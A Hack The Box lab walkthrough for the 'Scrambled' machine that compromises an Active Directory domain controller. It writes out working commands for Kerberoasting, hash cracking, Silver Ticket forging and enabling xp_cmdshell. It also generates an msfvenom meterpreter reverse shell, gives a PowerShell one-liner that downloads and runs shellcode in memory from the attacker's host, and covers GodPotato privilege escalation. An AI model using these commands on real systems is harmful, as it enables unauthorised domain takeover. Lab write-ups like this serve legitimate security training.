Hack The Box: Scrambled
Walkthrough
- Nmap
- Website shows a username and hints for a password
- Login to SMB-Share, NTLM Authentication seems disabled
- Download PDF, NTLM Authentication is indeed disabled
- Kerberoasting
- Crack Hash of a service Account
- Create Silver Ticket to access the MSSQL Server impersonating an Administator
- Enable xp_cmdshell
- Get reverseshell as service account
- Abuse ImpersonatePrivilege using GodPotato to escalate to NT-Authority\System
At the beginning we start with performing a initial nmap port scan. This series of walkthroughs mainly focusses on Windows and Active Directory so this Box is a Domain Controller. We can also verify this by observing the port scan results. Here we can see the open Kerberos Port 88 which indicates this is a Domain Controller.
A small scan on the open LDAP Port also shows the devices name used for the SSL-Cert: DC1.scrm.local. We save that with the corresponding domain scrm.local to our local /etc/hosts file.
The initial nmap Scan also shows the open web port 80 so the DC hosts a website. Lets look into that first. The Website is a very static template with a few subsites where only two were really interesting. The first one was a site about contacting the support. But in the image a username can be seen: ksimpson. So we have a possible username for the AD environment.
The second interesting site was about password resets. It states that if you contact the support your password gets changed equal to your username. ksimpson did contact the support for demo purposes, so maybe his password got changed to his username ?
I tried to connect to the smb shares as ksimpson but failed. I noticed the error message that the request isnt supported. So maybe NTLM Authentication is disabled. So I tried Kerberos instead which worked.
Now I was able to list all shares.
impacket-smbclient scrm.local/ksimpson:ksimpson@dc1.scrm.local -k
There were alot and I didnt want to enumerate them manually so I used CrackMapExec instead with the Module spider_plus which enumerates all Files on all accessable shares and creates a list of them.
cme smb dc1.scrm.local -k -d scrm.local -u ksimpson -p ksimpson -M spider_plus
We can see a Pdf file named “Network Security Changed.pdf” which looked promising. So I connected once more to the Shares and downloaded it.
It stated that NTLM Authentication was indeed disabled and also that all Access to the MSSQL Database got removed except for Network Administrators. So nothing really more special here.
But we have valid credentials. We could try to enumerate the domain or attempt to kerberoast users with them. So lets start with Kerberoasting. We indeed found a user which has a ServicePrincipalName set: scrm.local/sqlsvc. Lets try to crack his password using hashcat.
impacket-GetUserSPNs scrm.local/ksimpson@dc1.scrm.local -request -dc-host dc1.scrm.local -k
We copy that hash to a machine which has a better GPU installed and try to crack it using rockyou.txt. But first we need to identify the correct mode for hashcat. A simple Search reveils that mode 13100 is required to crack kerberoast hashes.
And we were able to crack it. We now have valid credentials for the user scrm.local/sqlsvc: Pegasus60
Now what can we do with that. We now we just cracked the service Account the MSSQL Database runs under. We know this because of the users name and the SPN he has set which points to the Database. We also now that only Network Administratos are allowed to connect to that machine.
So when we have Credentials or Hashes of a Service Account we can create Silver Tickets to access that service impersonating anyone we want including Administrators.
A Silver Ticket is a forged TGS (Ticket Granting Service) ticket, which is used directly between the client and the service, without necessarily going to the DC. Instead, the TGS ticket is signed by the service account itself, and thus the Silver Ticket is limited to authenticating only the service itself.
To create a Silver Ticket, an attacker needs:
-
The NTLM hash of the password for the service account;
-
The SID of the domain
-
The service principle name (SPN) associated with the service account.
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
To get the NTLM Hash of our known Password we can simply use openssl
iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4
To get the SID of the domain scrm.local we can simply request a PAC of a known user since we have valid credentials. Impacket-getPAC.py will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. This also contains the Domain SID.
impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson
Now we have all necessary values since we can simply copy the SPN from impackets-GetUserSPNs.py.
Using the following command we can now request a Silver Ticket impersonating an Administrator Account, here Administrator. We supply all values needed and get a ticket saved to disk. We can now export that to our session.
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain scrm.local -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -spn MSSQLSvc/dc1.scrm.local:1433 administrator
And since we now have a silver Ticket which the sqlsvc on that machine can decrypt we can try to login using that ticket.
export KRB5CCNAME=administrator.ccache
impacket-mssqlclient -k dc1.scrm.local
Nice we got access impersonating the Administrator account. We now can enable xp_cmdshell to execute commands through the MSSQL Database and run a whoami command. Since the Database runs under the user sqlsvc, this user also executes the commands. But we can confirm that we already have code execution on the DC as a service Account.
So now lets get a meterpreter reverse shell. Netcat is nice and all but meterpreter and all its modules can be really helpful. It makes you only a skid if you dont know what you are doing.
So to get a reverse shell I setup the multi/handler with an encrypted https_reverse shell pointing to my tun0 interface which is the interface created by openvpn.
To get a rverse shell I like to use this Powershell script which completely runs in memory, doesnt touches disk at all and is a very small oneliner to execute. It uses Delegates and already loaded Windows API Fuctions (GetProcAdress) to resolve and execute further Windows API Functions.
What's going on here:
- lookupFunc → to obtain a reference to the System.dll assembly's GetModuleHandle and GetProcAddress methods using GetType and GetMethod functions (aka the Reflection technique).
- getDelegateType → to define the argument types for the APIs using a delegate type via Reflection and return it.
- VirtualAlloc → to allocate writable, readable, and executable (unmanaged) memory space in virtual address space of the calling process.
- Copy → to copy the shellcode bytes into allocated memory location.
- CreateThread → to create a new execution thread in the calling process and execute the shellcode.
- WaitForSingleObject → to delay termination of the PowerShell script until the shell fully executes.
We now simply have to generate Shellcode for this template and paste it in
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.38 LPORT=443 EXITFUNC=thread -f ps1
To execute our Shellcode we simply have to to download and execute the Script in memory through the powershell, which is a really easy Oneliner:
xp_cmdshell "powershell.exe iex(iwr -usebasicparsing 10.10.16.38/CreateThreadDeleg.ps1)"
And after that we get our meterpreter session.
The first Thing is now to migrate into a more stable process so when our initial process suddenly dies we dont loose our shell.
After I get a shell one of the first things im doing is to enumerate the users privileges. And since this is service account the SeImpersonatePrivilege is very common. This can easily be abused to get Command execution as Nt-Authority\System.
A common tool to do that is juicy potato and the other potato methods. I personally like to use GodPotato since this supported by all current windows versions up to Windows Server 2022. We simply upload GodPotato to a writable Path to the targets disk.
https://github.com/BeichenDream/GodPotato
After that its very easy to execute commands as NT AUTHORITY\SYSTEM. Simply provide the Command you want to execute in the -cmd paramter. I like to create a new local admin user since this would make me automatically an Domain Admin. We also cant perform Pass-The-Hash Attcks because NTLM Authentication has been disabled. But we can use kerberos and simply provide known credentials. So here I create a new local use MHT.
And now Im adding him to the local administrators group on the DC making me a indirect Domain Admin
Now we can simply login and get our flags. Thats it.
I am aware that there are further ways to get System besides getting a reverse shell as the service user. But this was the most straight forwarded, easiest and fastest way to get System on this box.
Leave a comment